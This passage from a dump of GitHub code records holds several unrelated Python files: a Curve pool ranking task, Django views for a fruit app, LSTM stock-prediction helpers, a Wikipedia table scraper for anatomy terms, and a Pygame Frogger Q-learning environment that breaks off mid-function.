suffixes=[\"_yesterday\", \"_today\"]\n )\n # filter no value pools\n threshold = 50000\n df = df[(df[\"tvl_yesterday\"] > 0) & (df[\"tvl_today\"] > threshold)]\n df[\"tvl_growth\"] = (\n (df[\"tvl_today\"] - df[\"tvl_yesterday\"]) / df[\"tvl_yesterday\"] * 100\n )\n df[\"name\"] = df[\"name\"].apply(shortify_pool_name)\n\n losers = df.sort_values(\"tvl_growth\")[:10][\n [\"pool\", \"chain\", \"name\", \"tvl_growth\"]\n ].to_dict(orient=\"records\")\n gainers = df.sort_values(\"tvl_growth\", ascending=False)[:10][\n [\"pool\", \"chain\", \"name\", \"tvl_growth\"]\n ].to_dict(orient=\"records\")\n redis.set(\"tvl_losers\", json.dumps(losers))\n redis.set(\"tvl_gainers\", json.dumps(gainers))\n\n\ndef get_top_vol_tvl_utilization():\n logger.info(\"Getting volumes & tvl stats by chain & pool types\")\n today = int((time.time() // DAY) * DAY - DAY)\n query = (\n db.session.query(\n CurvePoolSnapshot.pool,\n CurvePoolSnapshot.chain,\n CurvePoolSnapshot.volumeUSD,\n CurvePoolSnapshot.tvl,\n CurvePool.isV2,\n CurvePool.name,\n CurvePool.assetType,\n CurvePool.poolType,\n )\n .join(\n CurvePool,\n and_(\n CurvePoolSnapshot.pool == CurvePool.address,\n CurvePoolSnapshot.chain == CurvePool.chain,\n ),\n )\n .filter(CurvePoolSnapshot.timestamp == today)\n .filter(blacklist_filter)\n .all()\n )\n if len(query) < 1:\n return\n\n df = pd.DataFrame(query)\n df[\"name\"] = df[\"name\"].apply(shortify_pool_name)\n\n def label_pool(row):\n if row[\"isV2\"]:\n return \"V2\"\n elif row[\"poolType\"] == \"CRVUSD\":\n return \"CRVUSD\"\n elif row[\"assetType\"] == 0:\n return \"V1-USD\"\n elif row[\"assetType\"] == 1:\n return \"V1-ETH\"\n elif row[\"assetType\"] == 2:\n return \"V1-BTC\"\n else:\n return \"V1-OTHER\"\n\n df[\"type\"] = df[[\"isV2\", \"poolType\", \"assetType\"]].apply(\n label_pool, axis=1\n )\n volume_breakdown = (\n df[[\"chain\", \"volumeUSD\"]]\n .groupby(\"chain\")\n .sum()\n .reset_index()\n .to_dict(orient=\"records\")\n )\n\n tvl_breakdown = (\n df[[\"chain\", \"tvl\"]]\n .groupby(\"chain\")\n .sum()\n .reset_index()\n .to_dict(orient=\"records\")\n )\n redis.set(\"volume_breakdown_chain\", json.dumps(volume_breakdown))\n redis.set(\"tvl_breakdown_chain\", json.dumps(tvl_breakdown))\n\n volume_breakdown = (\n df[[\"type\", \"volumeUSD\"]]\n .groupby(\"type\")\n .sum()\n .reset_index()\n .to_dict(orient=\"records\")\n )\n tvl_breakdown = (\n df[[\"type\", \"tvl\"]]\n .groupby(\"type\")\n .sum()\n .reset_index()\n .to_dict(orient=\"records\")\n )\n redis.set(\"volume_breakdown_type\", json.dumps(volume_breakdown))\n redis.set(\"tvl_breakdown_type\", json.dumps(tvl_breakdown))\n\n df = df[(df[\"volumeUSD\"] > 50000) & (df[\"tvl\"] > 100000)]\n df[\"liq_use\"] = df[\"volumeUSD\"] / df[\"tvl\"]\n big_users = df.sort_values(\"liq_use\", ascending=False)[:10][\n [\"pool\", \"chain\", \"name\", \"liq_use\"]\n ].to_dict(orient=\"records\")\n redis.set(\"big_users\", json.dumps(big_users))\n\n\ndef get_sizeable_trades():\n logger.info(\"Getting latest sizeable trades\")\n today = int((time.time() // DAY) * DAY - DAY)\n QUERY = \"\"\"\n {\n swapEvents(where:{timestamp_gt: %d} orderBy: amountSoldUSD orderDirection: desc first: 10) {\n tx\n amountSoldUSD\n pool {\n address\n name\n }\n }\n }\n \"\"\"\n graph_query = QUERY % today\n all_swaps = []\n for chain in CHAINS:\n data = grt_curve_pools_query(chain, graph_query)\n swaps = [\n {\n \"tx\": d[\"tx\"],\n \"value\": d[\"amountSoldUSD\"],\n \"chain\": chain,\n \"pool\": d[\"pool\"][\"address\"],\n \"name\": d[\"pool\"][\"name\"],\n }\n for d in 
data[\"swapEvents\"]\n ]\n all_swaps += swaps\n df = pd.DataFrame(all_swaps)\n df[\"value\"] = df[\"value\"].astype(float)\n trades = df.sort_values(\"value\", ascending=False)[:50].to_dict(\n orient=\"records\"\n )\n redis.set(\"sizeable_trades\", json.dumps(trades))\n","repo_name":"convex-community/subgraphs-api","sub_path":"app/tasks/queries/curve/rankings.py","file_name":"rankings.py","file_ext":"py","file_size_in_byte":6837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16490262218","text":"from django.shortcuts import render, redirect\nfrom regular_exam_python_web.fruits.models import Profile, Fruits\nfrom regular_exam_python_web.fruits.forms import CreateProfileForm, FruitCreateForm, FruitEditForm, FruitDeleteForm, EditProfileForm, DeleteProfileForm\n\ndef index(request):\n profile = Profile.objects.first()\n\n context = {\n 'profile': profile\n }\n\n return render(request, 'home/index.html', context=context)\n\ndef dashboard(request):\n fruits = Fruits.objects.all()\n profile = Profile.objects.first()\n\n context = {\n 'fruits': fruits,\n 'profile': profile\n }\n\n return render(request, 'dashboard/dashboard.html', context=context)\n\ndef create_profile(request):\n if request.method == 'GET':\n form = CreateProfileForm()\n else:\n form = CreateProfileForm(request.POST)\n\n if form.is_valid():\n form.save()\n return redirect('dashboard')\n \n context = {\n 'form': form\n }\n\n return render(request, 'profiles/create-profile.html', context=context)\n\ndef edit_profile(request):\n profile = Profile.objects.first()\n\n if request.method == 'GET':\n form = EditProfileForm(instance=profile)\n else:\n form = EditProfileForm(request.POST, instance=profile)\n\n if form.is_valid():\n form.save()\n return redirect('details profile')\n \n context = {\n 'form': form,\n 'profile': profile\n }\n\n return render(request, 'profiles/edit-profile.html', context=context)\n\ndef details_profile(request):\n profile = Profile.objects.first()\n fruits = Fruits.objects.count()\n\n context = {\n 'profile': profile,\n 'fruits_count': fruits\n }\n\n return render(request, 'profiles/details-profile.html', context=context)\n\ndef delete_profile(request):\n profile = Profile.objects.first()\n\n if request.method == 'GET':\n form = DeleteProfileForm(instance=profile)\n else:\n form = DeleteProfileForm(request.POST, instance=profile)\n\n if form.is_valid():\n form.save()\n return redirect('index')\n \n context = {\n 'form': form,\n 'profile': profile\n }\n\n return render(request, 'profiles/delete-profile.html', context=context)\n\ndef create_fruit(request):\n profile = Profile.objects.first()\n\n if request.method == 'GET':\n form = FruitCreateForm()\n else:\n form = FruitCreateForm(request.POST)\n\n if form.is_valid():\n form.save()\n return redirect('dashboard')\n \n context = {\n 'form': form,\n 'profile': profile\n }\n\n return render(request, 'fruits/create-fruit.html', context=context)\n\ndef details_fruit(request, pk):\n profile = Profile.objects.first()\n fruit = Fruits.objects.get(pk=pk)\n\n context = {\n 'profile': profile,\n 'fruit': fruit\n }\n\n return render(request, 'fruits/details-fruit.html', context=context)\n\ndef edit_fruit(request, pk):\n profile = Profile.objects.first()\n fruit = Fruits.objects.get(pk=pk)\n\n if request.method == 'GET':\n form = FruitEditForm(instance=fruit)\n else:\n form = FruitEditForm(request.POST, instance=fruit)\n\n if form.is_valid():\n form.save()\n return redirect('dashboard')\n \n context = {\n 
'form': form,\n 'profile': profile\n }\n\n return render(request, 'fruits/edit-fruit.html', context=context)\n\ndef delete_fruit(request, pk):\n profile = Profile.objects.first()\n fruit = Fruits.objects.get(pk=pk)\n\n if request.method == 'GET':\n form = FruitDeleteForm(instance=fruit)\n else:\n form = FruitDeleteForm(request.POST, instance=fruit)\n\n if form.is_valid():\n form.save()\n return redirect('dashboard')\n \n context = {\n 'form': form,\n 'profile': profile\n }\n\n return render(request, 'fruits/delete-fruit.html', context=context)","repo_name":"AlexDimov-04/Software-Engineering-SoftUni","sub_path":"Python Web - май 2023/Python Web Basics/Exams/Exam_Preps/regular_exam_python_web/regular_exam_python_web/fruits/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3969,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"71573911047","text":"import pandas as pd\nimport numpy as np\nfrom sklearn import preprocessing\nnp.random.seed(4)\nimport datetime\nimport os\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' # 2 = INFO and WARNING messages are not printed\nimport tensorflow as tf\n\nfrom keras.models import Model, load_model\nfrom keras.layers import Dense, Dropout, LSTM, Input, Activation, concatenate\nfrom keras import optimizers\ntf.random.set_seed(4)\n\ndef data_prep_new_lstm(data, n_past=50, n_future=5, include_ma = False):\n '''\n DESCRIPTION:\n Prepares data for input into an LTSM model. Transforms the data dataframe into sequential time step data depending on the\n specified values for n_past and n_future. \n\n INPUT:\n data - (dataframe) A data frame containing open, high, low, close and adjusted close stock prices for a specific stock as well as the\n volume of stocks traded. 
(Index of data frame must be date column)\n n_past - (int) The number of data points that will be used when predicting a stock price\n n_future - (int) The number of time steps into the future the model should be able to predict for\n include_ma - (bool) Should a moving average of n_past days be included as a feature\n\n OUTPUT:\n data_normal_hist - (array) Matrix of open, close, low, high and volume scaled values in sections of n_past size data groups\n (Dimensions: rows x n_past x features)\n data_normal_nextday - (array) Matrix of scaled values at index n_future away from n_past data groups (Dimensions: rows x 1)\n data_values_nextday - (array) Matrix of adjusted closing price values at index n_future away from n_past data groups (Dimensions: rows x 1)\n y_normalizer - (object) A minmaxscaler object to be used to convert scaled predicted values back to non-scaled values\n date_list - (list) A list of dates from the data frame\n data_normal_hist_future - (array) Data set to be used to predict future values with\n date_list_future - (array) Date list of future values\n tech_ind_ma_normal - (array) Normalised values of moving average of n_past days\n ''' \n \n #X-values: open, closing, high, low stock prices and volume of stocks traded to input into lstm model\n normalizer = preprocessing.MinMaxScaler(feature_range=(-1,1))\n normalized_data = normalizer.fit_transform(data.drop(['AdjClose'], axis=1))\n data_normal_hist = np.array([normalized_data[:, 0: 5][i-n_future-n_past : i-n_future].copy() for i in range(len(normalized_data)-1, n_past + n_future, -1)])[::-1]\n data_normal_hist_future = np.array([normalized_data[:, 0: 5][i-n_past : i].copy() for i in range(len(normalized_data)-1, len(normalized_data)-1-n_future, -1)])[::-1]\n \n #Dates to use for plotting the results of the model\n date_list = [data.index[i] for i in range(len(data)-1, n_past + n_future, -1)][::-1]\n date_list_future = []\n for i in range (1, n_future+1):\n date_list_future.append(date_list[-1]+datetime.timedelta(days=i))\n\n #Y-values: adjusted closing stock price\n data_values_nextday = np.array([data.AdjClose[i].copy() for i in range(len(data)-1, n_past + n_future, -1)])[::-1]\n data_values_nextday = np.expand_dims(data_values_nextday, -1) \n y_normalizer = preprocessing.MinMaxScaler(feature_range=(-1,1))\n y_normalizer.fit(data_values_nextday) \n data_normal_nextday = y_normalizer.fit_transform(data_values_nextday)\n \n #Check if a technical indicator of moving average for n_past days must be incorporated in the preprocessing step\n if include_ma:\n #Technical indicator feature, moving average of n_past days for closing price of stock\n tech_ind_ma_normal = np.array([np.mean(data_normal_hist[i][:,3]) for i in range (data_normal_hist.shape[0])])\n tech_ind_ma_normal = np.expand_dims(tech_ind_ma_normal, -1)\n tech_ind_ma_normal_future = np.array([np.mean(data_normal_hist_future[i][:,3]) for i in range(data_normal_hist_future.shape[0])])\n tech_ind_ma_normal_future = np.expand_dims(tech_ind_ma_normal_future, -1)\n return data_normal_hist, data_normal_nextday, data_values_nextday, y_normalizer, date_list, data_normal_hist_future, date_list_future, tech_ind_ma_normal, tech_ind_ma_normal_future \n \n return data_normal_hist, data_normal_nextday, data_values_nextday, y_normalizer, date_list, data_normal_hist_future, date_list_future \n\n\ndef test_train_split(test_split, data_normal_hist, data_values_nextday, data_normal_nextday, date_list, include_ma = False, tech_ind_ma_normal=0):\n '''\n DESCRIPTION:\n Splits a data set 
into training and testing sets.\n\n INPUT:\n test_split - (float) Percentage of data set to be part of training set (this is a decimal ie. 0.8)\n data_normal_hist - (array) Matrix of open, close, low, high and volume scaled values in sections of n_past size data groups\n (Dimensions: rows x n_past x features)\n data_values_nextday - (array) Matrix of adjusted closing price values at index n_future away from n_past data groups \n (Dimensions: rows x 1)\n data_normal_nextday - (array) Matrix of scaled values at index n_future away from n_past data groups (Dimensions: rows x 1)\n date_list - (list) List of all dates in the data set\n tech_ind_ma_normal - (array) An array of 50 day moving averages\n \n OUTPUT:\n data_normal_hist_train (array) - Training set matrix of open, close, low, high and volume scaled values in sections of n_past size data groups\n data_normal_nextday_train (array) - Training set matrix of scaled values at index n_future away from n_past data groups (Dimensions: rows x 1)\n data_normal_hist_test (array) - Testing set matrix of open, close, low, high and volume scaled values in sections of n_past size data groups\n data_normal_nextday_test (array) - Testing set matrix of scaled values at index n_future away from n_past data groups (Dimensions: rows x 1)\n data_values_nextday_test (array) - Test set adjusted closing price values at index n_future away from n_past data groups \n (Dimensions: rows x 1)\n date_list_train (array) - List of training data set dates\n date_list_test (array) - List of testing data set dates\n tech_ind_ma_normal_train (array) - An array of 50 day moving averages for training set\n tech_ind_ma_normal (array) - An array of 50 day moving averages for testing set\n ''' \n \n n = int(data_normal_hist.shape[0] * test_split)\n \n #Prepare training data\n data_normal_hist_train = data_normal_hist[: n]\n data_normal_nextday_train = data_normal_nextday[: n]\n data_values_nextday_train = data_values_nextday[:n]\n date_list_train = date_list[: n]\n \n #Prepare testing data\n data_normal_hist_test = data_normal_hist[n: ]\n data_normal_nextday_test = data_normal_nextday[n: ]\n data_values_nextday_test = data_values_nextday[n: ]\n date_list_test = date_list[n: ]\n \n #Check if Moving average is included for this test/train split\n if include_ma:\n tech_ind_ma_normal_test = tech_ind_ma_normal[n: ]\n tech_ind_ma_normal_train = tech_ind_ma_normal[: n]\n return data_normal_hist_train, data_normal_nextday_train, data_normal_hist_test, data_normal_nextday_test, data_values_nextday_test, date_list_train, date_list_test, tech_ind_ma_normal_train, tech_ind_ma_normal_test\n\n return data_normal_hist_train, data_normal_nextday_train, data_normal_hist_test, data_normal_nextday_test, data_values_nextday_test, date_list_train, date_list_test\n\ndef create_lstm_basic_model(n_past=50, learning_rate=0.0005):\n '''\n DESCRIPTION:\n Creates an LSTM model that considers n_past time steps when predicting a future value. 
This models uses a linear activation \n function\n\n INPUT:\n n_past - (int) Days to use when predicting a value\n learning_rate - (int) Learning rate to use for the model\n \n OUTPUT:\n model (object) - An LSTM model object\n ''' \n np.random.seed(4)\n tf.random.set_seed(4)\n lstm_input = Input(shape=(n_past, 5), name='lstm_input')\n x = LSTM(50, name='lstm_0')(lstm_input)\n x = Dropout(0.2, name='lstm_dropout_0')(x)\n x = Dense(64, name='dense_0')(x)\n x = Activation('sigmoid', name='sigmoid_0')(x)\n x = Dense(1, name='dense_1')(x)\n output = Activation('linear', name='linear_output')(x)\n model = Model(inputs=lstm_input, outputs=output)\n adam = optimizers.Adam(learning_rate)\n model.compile(optimizer=adam, loss='mse')\n return model\n\ndef create_lstm_TA_model(tech_ind_ma_normal, n_past=50, learning_rate=0.0005, neurons=50):\n '''\n DESCRIPTION:\n Creates an LSTM model that considers n_past time steps when predicting a future value. This models uses a linear activation \n function and uses a moving average technical indicator to train the model.\n\n INPUT:\n n_past - (int) Days to use when predicting a value\n learning_rate - (int) Learning rate to use for the model\n neurons - (int) Number of neurons to use for the model\n tech_ind_ma_normal - (array) Normalised values of moving average of n_past days\n \n OUTPUT:\n model (object) - An LSTM model object\n ''' \n np.random.seed(4)\n tf.random.set_seed(4)\n # define two sets of model inputs\n lstm_input = Input(shape=(n_past, 5), name='lstm_input')\n dense_input = Input(shape=(tech_ind_ma_normal.shape[1],), name='tech_input')\n\n # the first branch operates on the first input\n x = LSTM(neurons, name='lstm_0')(lstm_input)\n x = Dropout(0.2, name='lstm_dropout_0')(x)\n lstm_branch = Model(inputs=lstm_input, outputs=x)\n\n # the second branch opreates on the second input\n y = Dense(20, name='tech_dense_0')(dense_input)\n y = Activation(\"relu\", name='tech_relu_0')(y)\n y = Dropout(0.2, name='tech_dropout_0')(y)\n technical_indicators_branch = Model(inputs=dense_input, outputs=y)\n\n # combine the output of the two branches\n combined = concatenate([lstm_branch.output, technical_indicators_branch.output], name='concatenate')\n\n z = Dense(64, activation=\"sigmoid\", name='dense_pooling')(combined)\n z = Dense(1, activation=\"linear\", name='dense_out')(z)\n\n # the model will accept the inputs of the two branches and then output a single value\n model = Model(inputs=[lstm_branch.input, technical_indicators_branch.input], outputs=z)\n\n adam = optimizers.Adam(learning_rate)\n\n model.compile(loss='mean_squared_error', optimizer='adam') \n return model\n\n","repo_name":"dirklambrechts/UdacityCapstoneProject_StockPredictor","sub_path":"Stock_price_prediction_web_application/Model_data_prep.py","file_name":"Model_data_prep.py","file_ext":"py","file_size_in_byte":10447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26671939116","text":"# -*- coding: utf-8 -*-\nfrom anatomy_tagging.models import Term\nfrom bs4 import BeautifulSoup\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\nfrom optparse import make_option\nimport copy\nimport json\nimport os\nimport wikipedia\n\n\nWIKI_PAGE_MUSCLES = 'List_of_muscles_of_the_human_body'\nWIKI_PAGE_FORAMINA = 'List_of_foramina_of_the_human_body'\n\n\nclass Command(BaseCommand):\n help = u\"\"\"Scrape info about terms from wikipedia\"\"\"\n\n option_list = BaseCommand.option_list + (\n make_option(\n 
'--delete',\n action='store_true',\n dest='delete',\n default=False,\n help='Delete images and paths at first',\n ),\n make_option(\n '--page',\n type=str,\n dest='page',\n default=WIKI_PAGE_MUSCLES,\n help='Name of the WIKI page'\n )\n )\n\n def handle(self, *args, **options):\n self.get_relations(options['page'])\n\n def get_relations(self, page_name, main_term_column_index=0):\n if page_name == WIKI_PAGE_FORAMINA:\n main_term_column_index = 2\n self.init_terms()\n json_name = os.path.join(settings.MEDIA_DIR, page_name + '.json')\n if os.path.isfile(json_name):\n with open(json_name, 'r') as f:\n raw_relations = json.load(f)\n return raw_relations\n\n page = wikipedia.page(page_name)\n soup = BeautifulSoup(page.html())\n tables = soup.findAll(\"table\", {\"class\": \"wikitable\"})\n raw_relations = []\n for table in tables:\n relations = self.process_table(table, main_term_column_index)\n raw_relations = raw_relations + relations\n\n with open(json_name, 'w') as f:\n json.dump(raw_relations, f)\n\n return copy.deepcopy(raw_relations)\n\n def init_terms(self):\n if hasattr(self, 'terms'):\n return\n terms = Term.objects.prepare_related().all()\n self.terms = {}\n for t in terms:\n for name in t.name_la.split(';') if t.name_la is not None else []:\n self.terms[name.lower()] = t\n for name in t.name_en.split(';') if t.name_en is not None else []:\n self.terms[name.lower()] = t\n\n def get_term_name(self, cell):\n return \" \".join([c.strip() for c in cell.findAll(text=True)]).strip()\n\n def get_term_from_cell(self, cell):\n term = None\n links = cell.findAll('a')\n if len(links) == 1:\n title = links[0].get('title', None)\n term = self.get_term_from_name(title)\n if term is not None:\n return term\n\n name = self.get_term_name(cell)\n term = self.get_term_from_name(name)\n return term\n\n def get_term_from_name(self, name):\n term = None\n if name is None:\n return None\n name = name.lower().strip()\n if name != \"\":\n term = self.terms.get(name, None)\n if term is None:\n term = self.terms.get(name.replace(\" muscle\", \"\"), None)\n return None if term is None else term.to_serializable()\n\n def process_table(self, table, main_term_column_index):\n relations = []\n header = table.find(\"tr\").findAll(\"th\")\n header = [h.find(text=True).strip() for h in header]\n for row in table.findAll(\"tr\")[1:]:\n cells = row.findAll(\"td\")\n if len(cells) == len(header):\n relations_dict = {}\n main_term = self.get_term_from_cell(cells[main_term_column_index])\n for h, c in zip(header, cells):\n term = self.get_term_from_cell(c)\n if term != main_term:\n relations_dict[h] = c\n relation = {\n 'type': h,\n 'term1': main_term,\n 'term2': term,\n 'text1': self.get_term_name(cells[main_term_column_index]),\n 'text2': self.get_term_name(c),\n }\n relations.append(relation)\n return relations\n","repo_name":"adaptive-learning/anatomy-tagging","sub_path":"anatomy_tagging/management/commands/scrape_wiki.py","file_name":"scrape_wiki.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4247730585","text":"import math\nimport os\nimport pickle\nimport random\n\nimport numpy as np\nimport pygame\nimport matplotlib\nimport matplotlib.pyplot as plt\n\n# Données environnement\nFILE_QTABLE = 'qtable.dat'\nMAX_STEPS = 200\nCOOLING_RATE = 0.99\nCOOLING_RATE_DECAY = 0.9995\nALPHA = 0.1 # Learning Rate\nGAMMA = 1\nMAP_HEIGHT = 10\nMAP_WIDTH = 10\nMAX_SESSION = 1000\nEXPLORATION = 1\n# Reward\nDEATH_REWARD = 
-100\nWIN_REWARD = 200\nSTEP_FORWARD_REWARD = 2\nSTEP_TO_SIDE_REWARD = -1\nSTEP_TO_BACK_REWARD = -2\nSTAY_REWARD = -1\n# Positionnement Target et frog\nFROG_START_X = 240\nFROG_START_Y = 540\nFROG_START_MAP_X = int(FROG_START_X / 60)\nFROG_START_MAP_Y = int(FROG_START_Y / 60)\nTARGET_X = 240\nTARGET_Y = 0\n\nFROG_SPEED = 6\n# taille des rectangles\nFROG_WIDTH = 60\nFROG_HEIGHT = 60\nTARGET_WIDTH = 60\nTARGET_HEIGHT = 60\nCAR_WIDTH = 120\nCAR_HEIGHT = 60\n\nBASE_HEIGHT = 60\n# Liste des actions\nACTION_UP = 0\nACTION_DOWN = 1\nACTION_LEFT = 2\nACTION_RIGHT = 3\nACTION_STAY = 4\nACTIONS = [ACTION_UP, ACTION_DOWN, ACTION_LEFT, ACTION_RIGHT, ACTION_STAY]\n\n# Images\nFROG_IMAGE = pygame.image.load(os.path.join('textures', 'frog.png'))\nCAR_IMAGE = pygame.image.load(os.path.join('textures', 'car.png'))\nTARGET_IMAGE = pygame.image.load(os.path.join('textures', 'target.png'))\n# plot\nPLT_TRONC = 100\n\n\nclass Rectangle:\n\n def __init__(self, image, rect):\n self.__image = image\n self.__rect = rect\n\n @property\n def image(self):\n return self.__image\n\n @property\n def rect(self):\n return self.__rect\n\n\nclass Frog(Rectangle):\n def __init__(self, image, rect, speed):\n super(Frog, self).__init__(image, rect)\n self.__temp_pos_x = self.rect.x\n self.__temp_pos_y = self.rect.y\n self.__speed = speed\n self.__is_move_validated = False\n self.__have_jump = False\n self.__current_pos = (FROG_START_MAP_X, FROG_START_MAP_Y)\n self.__action = None\n\n def move(self, action):\n\n if self.__have_jump:\n self.__is_move_validated = False\n self.__temp_pos_x = self.rect.x\n self.__temp_pos_y = self.rect.y\n\n if action == ACTION_UP:\n if self.rect.y > self.__temp_pos_y - self.rect.h:\n self.rect.y -= self.__speed\n self.__have_jump = False\n if self.rect.y < 0:\n self.rect.y = 0\n self.__have_jump = True\n else:\n self.__have_jump = True\n if not self.__is_move_validated:\n self.__current_pos = (self.__current_pos[0], self.__current_pos[1] - 1)\n self.__is_move_validated = True\n elif action == ACTION_RIGHT:\n if self.rect.x < self.__temp_pos_x + self.rect.w:\n self.rect.x += self.__speed\n self.__have_jump = False\n if self.rect.x > 540:\n self.rect.x = 540\n self.__have_jump = True\n else:\n self.__have_jump = True\n if not self.__is_move_validated:\n self.__current_pos = (self.__current_pos[0] + 1, self.__current_pos[1])\n self.__is_move_validated = True\n\n elif action == ACTION_LEFT:\n if self.rect.x > self.__temp_pos_x - self.rect.w:\n self.rect.x -= self.__speed\n self.__have_jump = False\n if self.rect.x < 0:\n self.rect.x = 0\n self.__have_jump = True\n else:\n self.__have_jump = True\n if not self.__is_move_validated:\n self.__current_pos = (self.__current_pos[0] - 1, self.__current_pos[1])\n self.__is_move_validated = True\n\n elif action == ACTION_DOWN:\n if self.rect.y < self.__temp_pos_y + self.rect.h:\n if self.rect.y > 540:\n self.rect.y = 540\n self.__have_jump = True\n else:\n self.__have_jump = True\n if not self.__is_move_validated:\n self.__current_pos = (self.__current_pos[0], self.__current_pos[1] + 1)\n self.__is_move_validated = True\n\n elif action == ACTION_STAY:\n self.__have_jump = True\n if not self.__is_move_validated:\n self.__is_move_validated = True\n\n @property\n def have_jump(self):\n return self.__have_jump\n\n @property\n def current_pos(self):\n return self.__current_pos\n\n @have_jump.setter\n def have_jump(self, value):\n self.__have_jump = value\n\n @current_pos.setter\n def current_pos(self, value):\n self.__current_pos = value\n\n\nclass Car(Rectangle):\n 
def __init__(self, image, rect):\n super(Car, self).__init__(image, rect)\n\n\nclass Target(Rectangle):\n def __init__(self, image, rect):\n super(Target, self).__init__(image, rect)\n\n\nclass Environment:\n\n def __init__(self, max_steps=MAX_STEPS, is_q_table=True, cooling_rate=COOLING_RATE, alpha=ALPHA, gamma=GAMMA, max_session=MAX_SESSION, exploration=EXPLORATION):\n self.__windows = pygame.display.set_mode((600, 600))\n self.__frog = None\n self.__target = None\n self.__max_next_q = None\n self.__list_car = []\n self.__collision_map = {(0, 0): 0}\n self.__max_steps = max_steps\n self.__q_table = None\n self.update_q_table(is_q_table)\n self.__reward = 0\n self.__current_state = None\n self.__next_state = None\n self.__cooling_rate = cooling_rate\n self.__max_q_arg = None\n self.__action = None\n self.__exploration = exploration\n self.__current_state = None\n self.__alpha = alpha\n self.__gamma = gamma\n self.__session_reward = 0\n self.__max_session = max_session\n self.__list_session_reward = []\n self.__my_font = None\n self.__is_able_to_die = True\n self.init()\n\n def init(self):\n self.init_frog()\n self.init_target()\n self.init_list_car()\n self.init_font()\n self.init_qtable()\n self.update_windows(0, 0)\n self.init_collision_map()\n\n def start(self, is_should_save= True):\n self.run_session(True)\n\n def init_font(self):\n pygame.font.init()\n self.__my_font = pygame.font.SysFont('Comic Sans MS', 30)\n\n def init_frog(self):\n self.__frog = Frog(FROG_IMAGE, pygame.Rect(FROG_START_X, FROG_START_Y, FROG_WIDTH, FROG_HEIGHT), FROG_SPEED)\n\n def init_target(self):\n self.__target = Target(TARGET_IMAGE, pygame.Rect(TARGET_X, TARGET_Y, TARGET_WIDTH, TARGET_HEIGHT))\n\n def init_list_car(self):\n for i in range(8):\n self.__list_car.append(\n Car(CAR_IMAGE, pygame.Rect(random.uniform(0, 540), BASE_HEIGHT * i + 60, CAR_WIDTH, CAR_HEIGHT)))\n\n def update_windows(self, session, reward):\n self.__windows.fill((0, 0, 0))\n self.__windows.blit(self.__frog.image, (self.__frog.rect.x, self.__frog.rect.y))\n self.__windows.blit(self.__target.image, (self.__target.rect.x, self.__target.rect.y))\n for i in range(len(self.__list_car)):\n if i % 2:\n self.__windows.blit(self.__list_car[i].image, (self.__list_car[i].rect.x, self.__list_car[i].rect.y))\n else:\n self.__windows.blit(pygame.transform.rotate(self.__list_car[i].image, 180),\n (self.__list_car[i].rect.x, self.__list_car[i].rect.y))\n\n text_surface = self.__my_font.render(f\"session : {session}, reward : {reward}\", False, (255, 255, 255))\n self.__windows.blit(text_surface, (0, 0))\n pygame.display.update()\n\n def init_collision_map(self):\n for j in range(10):\n for i in range(10):\n self.__collision_map[(i, j)] = 0\n\n def move_cars(self):\n for i in range(len(self.__list_car)):\n if i % 2:\n self.__list_car[i].rect.x += 3\n if self.__list_car[i].rect.x > 600:\n self.__list_car[i].rect.x = -self.__list_car[i].rect.w\n else:\n self.__list_car[i].rect.x -= 3\n if self.__list_car[i].rect.x < -self.__list_car[i].rect.w:\n self.__list_car[i].rect.x = 600\n\n def update_car_collision(self):\n for car in self.__list_car:\n if car.rect.x >= 0 and car.rect.w <= 600:\n pos_x = car.rect.x // 60\n pos_y = car.rect.y // 60\n car_hit_box = CAR_WIDTH // 60\n self.update_collision_map(pos_x, pos_y, car_hit_box)\n\n def update_collision_map(self, pos_x, pos_y, car_hit_box):\n if pos_y == 2:\n pos_x -= 1\n\n for i in range(10):\n self.__collision_map[(i, pos_y)] = 0\n\n for i in range(10):\n if i >= pos_x and i <= pos_x + car_hit_box:\n 
self.__collision_map[(i, pos_y)] = 1\n\n def check_collision(self):\n for car in self.__list_car:\n if self.__frog.rect.colliderect(car.rect):\n return True, False\n if self.__frog.rect.colliderect(self.__target.rect):\n return False, True\n return False, False\n\n def update_q_table(self, is_q_table):\n if is_q_table:\n if os.path.exists(FILE_QTABLE):\n old_table = open(FILE_QTABLE, 'rb')\n self.__q_table = pickle.load(old_table)\n else:\n pass\n else:\n pass\n\n def init_qtable(self):\n self.__q_table = {}\n # for state in range(MAP_HEIGHT * MAP_WIDTH):\n # self.__q_table[state] = {}\n # for action in ACTIONS:\n # self.__q_table[state][action] = 0\n for action_up in range(5):\n for action_right in range(5):\n for action_left in range(5):\n for action_down in range(5):\n for action_stay in range(5):\n for current_y in range(10):\n self.__q_table[action_up, action_right, action_left, action_down, action_stay, current_y] = [math.floor(random.uniform(0,5)) for i in range(5)]\n\n def save(self):\n with open(FILE_QTABLE, 'wb') as file:\n pickle.dump(self.__q_table, file)\n\n def update_state(self, is_next):\n\n state_stay = self.__collision_map[(self.__frog.current_pos[0], self.__frog.current_pos[1])]\n\n if self.__frog.current_pos[1] > 0:\n state_up = self.__collision_map[(self.__frog.current_pos[0], self.__frog.current_pos[1] - 1)]\n else:\n state_up = 2\n\n if self.__frog.current_pos[1] < 9:\n state_down = self.__collision_map[(self.__frog.current_pos[0], self.__frog.current_pos[1] + 1)]\n else:\n state_down = 2\n\n if self.__frog.current_pos[0] < 9:\n state_right = self.__collision_map[(self.__frog.current_pos[0] + 1, self.__frog.current_pos[1])]\n else:\n state_right = 2\n\n if self.__frog.current_pos[0] > 0:\n state_left = self.__collision_map[(self.__frog.current_pos[0] - 1, self.__frog.current_pos[1])]\n else:\n state_left = 2\n\n if not is_next:\n self.__current_state = (state_up, state_down, state_right, state_left, state_stay, self.__frog.current_pos[1])\n if np.random.uniform(0,1) < self.__exploration:\n self.__exploration *= self.__cooling_rate\n self.__max_q_arg = np.argmax(self.__q_table[self.__current_state])\n self.__action = self.__max_q_arg + 1\n else:\n self.__action = np.random.randint(1, 6)\n\n if self.__action == ACTION_UP and state_up == 2:\n return True\n if self.__action == 